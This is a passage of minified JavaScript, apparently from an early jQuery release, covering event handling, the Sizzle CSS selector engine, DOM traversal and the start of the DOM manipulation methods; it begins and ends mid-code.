RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)")}e=c.data(this,"events");d=e[a.type];if(e&&d){d=d.slice(0);e=0;for(var j=d.length;e<j;e++){var i=d[e];if(b||f.test(i.namespace)){a.handler=i.handler;a.data=i.data;a.handleObj=i;i=i.handler.apply(this,arguments);if(i!==w){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "), +fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||s;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=s.documentElement;d=s.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop|| +d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==w)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a){c.event.add(this,a.origType,c.extend({},a,{handler:oa}))},remove:function(a){var b=true,d=a.origType.replace(O,"");c.each(c.data(this, +"events").live||[],function(){if(d===this.origType.replace(O,""))return b=false});b&&c.event.remove(this,a.origType,oa)}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};var Ca=s.removeEventListener?function(a,b,d){a.removeEventListener(b,d,false)}:function(a,b,d){a.detachEvent("on"+b,d)};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent= +a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y, +isImmediatePropagationStopped:Y};var Da=function(a){var b=a.relatedTarget;try{for(;b&&b!==this;)b=b.parentNode;if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}}catch(d){}},Ea=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ea:Da,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ea:Da)}}});if(!c.support.submitBubbles)c.event.special.submit= +{setup:function(){if(this.nodeName.toLowerCase()!=="form"){c.event.add(this,"click.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="submit"||d==="image")&&c(b).closest("form").length)return na("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="text"||d==="password")&&c(b).closest("form").length&&a.keyCode===13)return na("submit",this,arguments)})}else return false},teardown:function(){c.event.remove(this,".specialSubmit")}}; +if(!c.support.changeBubbles){var da=/textarea|input|select/i,ea,Fa=function(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d},fa=function(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Fa(d);if(a.type!=="focusout"||d.type!=="radio")c.data(d,"_change_data", +e);if(!(f===w||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}};c.event.special.change={filters:{focusout:fa,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return fa.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return fa.call(this,a)},beforeactivate:function(a){a=a.target;c.data(a, +"_change_data",Fa(a))}},setup:function(){if(this.type==="file")return false;for(var a in ea)c.event.add(this,a+".specialChange",ea[a]);return da.test(this.nodeName)},teardown:function(){c.event.remove(this,".specialChange");return da.test(this.nodeName)}};ea=c.event.special.change.filters}s.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,f)}c.event.special[b]={setup:function(){this.addEventListener(a, +d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var j in d)this[b](j,f,d[j],e);return this}if(c.isFunction(f)){e=f;f=w}var i=b==="one"?c.proxy(e,function(k){c(this).unbind(k,i);return e.apply(this,arguments)}):e;if(d==="unload"&&b!=="one")this.one(d,f,e);else{j=0;for(var o=this.length;j<o;j++)c.event.add(this[j],d,i,f)}return this}});c.fn.extend({unbind:function(a,b){if(typeof a==="object"&& +!a.preventDefault)for(var d in a)this.unbind(d,a[d]);else{d=0;for(var f=this.length;d<f;d++)c.event.remove(this[d],a,b)}return this},delegate:function(a,b,d,f){return this.live(b,d,f,a)},undelegate:function(a,b,d){return arguments.length===0?this.unbind("live"):this.die(b,null,d,a)},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}}, +toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var Ga={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e,j){var i,o=0,k,n,r=j||this.selector, +u=j?this:c(this.context);if(c.isFunction(f)){e=f;f=w}for(d=(d||"").split(" ");(i=d[o++])!=null;){j=O.exec(i);k="";if(j){k=j[0];i=i.replace(O,"")}if(i==="hover")d.push("mouseenter"+k,"mouseleave"+k);else{n=i;if(i==="focus"||i==="blur"){d.push(Ga[i]+k);i+=k}else i=(Ga[i]||i)+k;b==="live"?u.each(function(){c.event.add(this,pa(i,r),{data:f,selector:r,handler:e,origType:i,origHandler:e,preType:n})}):u.unbind(pa(i,r),e)}}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "), +function(a,b){c.fn[b]=function(d){return d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});A.attachEvent&&!A.addEventListener&&A.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});(function(){function a(g){for(var h="",l,m=0;g[m];m++){l=g[m];if(l.nodeType===3||l.nodeType===4)h+=l.nodeValue;else if(l.nodeType!==8)h+=a(l.childNodes)}return h}function b(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q]; +if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=l;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}m[q]=y}}}function d(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=l;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(k.filter(h,[t]).length>0){y=t;break}}t=t[g]}m[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g, +e=0,j=Object.prototype.toString,i=false,o=true;[0,0].sort(function(){o=false;return 0});var k=function(g,h,l,m){l=l||[];var q=h=h||s;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||typeof g!=="string")return l;for(var p=[],v,t,y,S,H=true,M=x(h),I=g;(f.exec(""),v=f.exec(I))!==null;){I=v[3];p.push(v[1]);if(v[2]){S=v[3];break}}if(p.length>1&&r.exec(g))if(p.length===2&&n.relative[p[0]])t=ga(p[0]+p[1],h);else for(t=n.relative[p[0]]?[h]:k(p.shift(),h);p.length;){g=p.shift();if(n.relative[g])g+=p.shift(); +t=ga(g,t)}else{if(!m&&p.length>1&&h.nodeType===9&&!M&&n.match.ID.test(p[0])&&!n.match.ID.test(p[p.length-1])){v=k.find(p.shift(),h,M);h=v.expr?k.filter(v.expr,v.set)[0]:v.set[0]}if(h){v=m?{expr:p.pop(),set:z(m)}:k.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=v.expr?k.filter(v.expr,v.set):v.set;if(p.length>0)y=z(t);else H=false;for(;p.length;){var D=p.pop();v=D;if(n.relative[D])v=p.pop();else D="";if(v==null)v=h;n.relative[D](y,v,M)}}else y=[]}y||(y=t);y||k.error(D|| +g);if(j.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))l.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&y[g].nodeType===1&&l.push(t[g]);else l.push.apply(l,y);else z(y,l);if(S){k(S,q,l,m);k.uniqueSort(l)}return l};k.uniqueSort=function(g){if(B){i=o;g.sort(B);if(i)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};k.matches=function(g,h){return k(g,null,null,h)};k.find=function(g,h,l){var m,q;if(!g)return[]; +for(var p=0,v=n.order.length;p<v;p++){var t=n.order[p];if(q=n.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");m=n.find[t](q,h,l);if(m!=null){g=g.replace(n.match[t],"");break}}}}m||(m=h.getElementsByTagName("*"));return{set:m,expr:g}};k.filter=function(g,h,l,m){for(var q=g,p=[],v=h,t,y,S=h&&h[0]&&x(h[0]);g&&h.length;){for(var H in n.filter)if((t=n.leftMatch[H].exec(g))!=null&&t[2]){var M=n.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length- +1)!=="\\"){if(v===p)p=[];if(n.preFilter[H])if(t=n.preFilter[H](t,v,l,p,m,S)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=v[U])!=null;U++)if(D){I=M(D,t,U,v);var Ha=m^!!I;if(l&&I!=null)if(Ha)y=true;else v[U]=false;else if(Ha){p.push(D);y=true}}if(I!==w){l||(v=p);g=g.replace(n.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)k.error(g);else break;q=g}return v};k.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var n=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/, +CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}}, +relative:{"+":function(g,h){var l=typeof h==="string",m=l&&!/\W/.test(h);l=l&&!m;if(m)h=h.toLowerCase();m=0;for(var q=g.length,p;m<q;m++)if(p=g[m]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[m]=l||p&&p.nodeName.toLowerCase()===h?p||false:p===h}l&&k.filter(h,g,true)},">":function(g,h){var l=typeof h==="string";if(l&&!/\W/.test(h)){h=h.toLowerCase();for(var m=0,q=g.length;m<q;m++){var p=g[m];if(p){l=p.parentNode;g[m]=l.nodeName.toLowerCase()===h?l:false}}}else{m=0;for(q=g.length;m<q;m++)if(p=g[m])g[m]= +l?p.parentNode:p.parentNode===h;l&&k.filter(h,g,true)}},"":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("parentNode",h,m,g,p,l)},"~":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,m,g,p,l)}},find:{ID:function(g,h,l){if(typeof h.getElementById!=="undefined"&&!l)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var l=[]; +h=h.getElementsByName(g[1]);for(var m=0,q=h.length;m<q;m++)h[m].getAttribute("name")===g[1]&&l.push(h[m]);return l.length===0?null:l}},TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,l,m,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var v;(v=h[p])!=null;p++)if(v)if(q^(v.className&&(" "+v.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))l||m.push(v);else if(l)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()}, +CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,l,m,q,p){h=g[1].replace(/\\/g,"");if(!p&&n.attrMap[h])g[1]=n.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,l,m,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=k(g[3],null,null,h);else{g=k.filter(g[3],h,l,true^q);l||m.push.apply(m, +g);return false}else if(n.match.POS.test(g[0])||n.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,l){return!!k(l[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)}, +text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}}, +setFilters:{first:function(g,h){return h===0},last:function(g,h,l,m){return h===m.length-1},even:function(g,h){return h%2===0},odd:function(g,h){return h%2===1},lt:function(g,h,l){return h<l[3]-0},gt:function(g,h,l){return h>l[3]-0},nth:function(g,h,l){return l[3]-0===h},eq:function(g,h,l){return l[3]-0===h}},filter:{PSEUDO:function(g,h,l,m){var q=h[1],p=n.filters[q];if(p)return p(g,l,h,m);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h= +h[3];l=0;for(m=h.length;l<m;l++)if(h[l]===g)return false;return true}else k.error("Syntax error, unrecognized expression: "+q)},CHILD:function(g,h){var l=h[1],m=g;switch(l){case "only":case "first":for(;m=m.previousSibling;)if(m.nodeType===1)return false;if(l==="first")return true;m=g;case "last":for(;m=m.nextSibling;)if(m.nodeType===1)return false;return true;case "nth":l=h[2];var q=h[3];if(l===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var v=0;for(m=p.firstChild;m;m= +m.nextSibling)if(m.nodeType===1)m.nodeIndex=++v;p.sizcache=h}g=g.nodeIndex-q;return l===0?g===0:g%l===0&&g/l>=0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var l=h[1];g=n.attrHandle[l]?n.attrHandle[l](g):g[l]!=null?g[l]:g.getAttribute(l);l=g+"";var m=h[2];h=h[4];return g==null?m==="!=":m=== +"="?l===h:m==="*="?l.indexOf(h)>=0:m==="~="?(" "+l+" ").indexOf(h)>=0:!h?l&&g!==false:m==="!="?l!==h:m==="^="?l.indexOf(h)===0:m==="$="?l.substr(l.length-h.length)===h:m==="|="?l===h||l.substr(0,h.length+1)===h+"-":false},POS:function(g,h,l,m){var q=n.setFilters[h[2]];if(q)return q(g,l,h,m)}}},r=n.match.POS;for(var u in n.match){n.match[u]=new RegExp(n.match[u].source+/(?![^\[]*\])(?![^\(]*\))/.source);n.leftMatch[u]=new RegExp(/(^(?:.|\r|\n)*?)/.source+n.match[u].source.replace(/\\(\d+)/g,function(g, +h){return"\\"+(h-0+1)}))}var z=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};try{Array.prototype.slice.call(s.documentElement.childNodes,0)}catch(C){z=function(g,h){h=h||[];if(j.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var l=0,m=g.length;l<m;l++)h.push(g[l]);else for(l=0;g[l];l++)h.push(g[l]);return h}}var B;if(s.documentElement.compareDocumentPosition)B=function(g,h){if(!g.compareDocumentPosition|| +!h.compareDocumentPosition){if(g==h)i=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===h?0:1;if(g===0)i=true;return g};else if("sourceIndex"in s.documentElement)B=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)i=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)i=true;return g};else if(s.createRange)B=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)i=true;return g.ownerDocument?-1:1}var l=g.ownerDocument.createRange(),m= +h.ownerDocument.createRange();l.setStart(g,0);l.setEnd(g,0);m.setStart(h,0);m.setEnd(h,0);g=l.compareBoundaryPoints(Range.START_TO_END,m);if(g===0)i=true;return g};(function(){var g=s.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var l=s.documentElement;l.insertBefore(g,l.firstChild);if(s.getElementById(h)){n.find.ID=function(m,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(m[1]))?q.id===m[1]||typeof q.getAttributeNode!=="undefined"&& +q.getAttributeNode("id").nodeValue===m[1]?[q]:w:[]};n.filter.ID=function(m,q){var p=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&p&&p.nodeValue===q}}l.removeChild(g);l=g=null})();(function(){var g=s.createElement("div");g.appendChild(s.createComment(""));if(g.getElementsByTagName("*").length>0)n.find.TAG=function(h,l){l=l.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var m=0;l[m];m++)l[m].nodeType===1&&h.push(l[m]);l=h}return l};g.innerHTML="<a href='#'></a>"; +if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")n.attrHandle.href=function(h){return h.getAttribute("href",2)};g=null})();s.querySelectorAll&&function(){var g=k,h=s.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){k=function(m,q,p,v){q=q||s;if(!v&&q.nodeType===9&&!x(q))try{return z(q.querySelectorAll(m),p)}catch(t){}return g(m,q,p,v)};for(var l in g)k[l]=g[l];h=null}}(); +(function(){var g=s.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}: +function(g,h){return g!==h&&(g.contains?g.contains(h):true)},x=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},ga=function(g,h){var l=[],m="",q;for(h=h.nodeType?[h]:h;q=n.match.PSEUDO.exec(g);){m+=q[0];g=g.replace(n.match.PSEUDO,"")}g=n.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)k(g,h[q],l);return k.filter(m,l)};c.find=k;c.expr=k.selectors;c.expr[":"]=c.expr.filters;c.unique=k.uniqueSort;c.text=a;c.isXMLDoc=x;c.contains=E})();var eb=/Until$/,fb=/^(?:parents|prevUntil|prevAll)/, +gb=/,/;R=Array.prototype.slice;var Ia=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,j){return!!b.call(e,j,e)===d});else if(b.nodeType)return c.grep(a,function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Ua.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length; +c.find(a,this[f],b);if(f>0)for(var j=d;j<b.length;j++)for(var i=0;i<d;i++)if(b[i]===b[j]){b.splice(j--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ia(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ia(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,j= +{},i;if(f&&a.length){e=0;for(var o=a.length;e<o;e++){i=a[e];j[i]||(j[i]=c.expr.match.POS.test(i)?c(i,b||this.context):i)}for(;f&&f.ownerDocument&&f!==b;){for(i in j){e=j[i];if(e.jquery?e.index(f)>-1:c(f).is(e)){d.push({selector:i,elem:f});delete j[i]}}f=f.parentNode}}return d}var k=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(n,r){for(;r&&r.ownerDocument&&r!==b;){if(k?k.index(r)>-1:c(r).is(a))return r;r=r.parentNode}return null})},index:function(a){if(!a||typeof a=== +"string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),a);return this.pushStack(qa(a[0])||qa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode", +d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")? +a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);eb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):e;if((this.length>1||gb.test(f))&&fb.test(a))e=e.reverse();return this.pushStack(e,a,R.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===w||a.nodeType!==1||!c(a).is(d));){a.nodeType=== +1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==b&&d.push(a);return d}});var Ja=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ka=/(<([\w:]+)[^>]*?)\/>/g,hb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,La=/<([\w:]+)/,ib=/<tbody/i,jb=/<|&#?\w+;/,ta=/<script|<object|<embed|<option|<style/i,ua=/checked\s*(?:[^=]|=\s*.checked.)/i,Ma=function(a,b,d){return hb.test(d)? +a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d= +c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==w)return this.empty().append((this[0]&&this[0].ownerDocument||s).createTextNode(a));return c.text(this)},wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this}, +wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})}, +prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b, +this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},remove:function(a,b){for(var d=0,f;(f=this[d])!=null;d++)if(!a||c.filter(a,[f]).length){if(!b&&f.nodeType===1){c.cleanData(f.getElementsByTagName("*"));c.cleanData([f])}f.parentNode&&f.parentNode.removeChild(f)}return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++)for(b.nodeType===1&&c.cleanData(b.getElementsByTagName("*"));b.firstChild;)b.removeChild(b.firstChild); +return this},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Ja,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){ra(this,b);ra(this.find("*"),b.find("*"))}return b},html:function(a){if(a===w)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Ja, +""):null;else if(typeof a==="string"&&!ta.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(La.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Ka,Ma);try{for(var 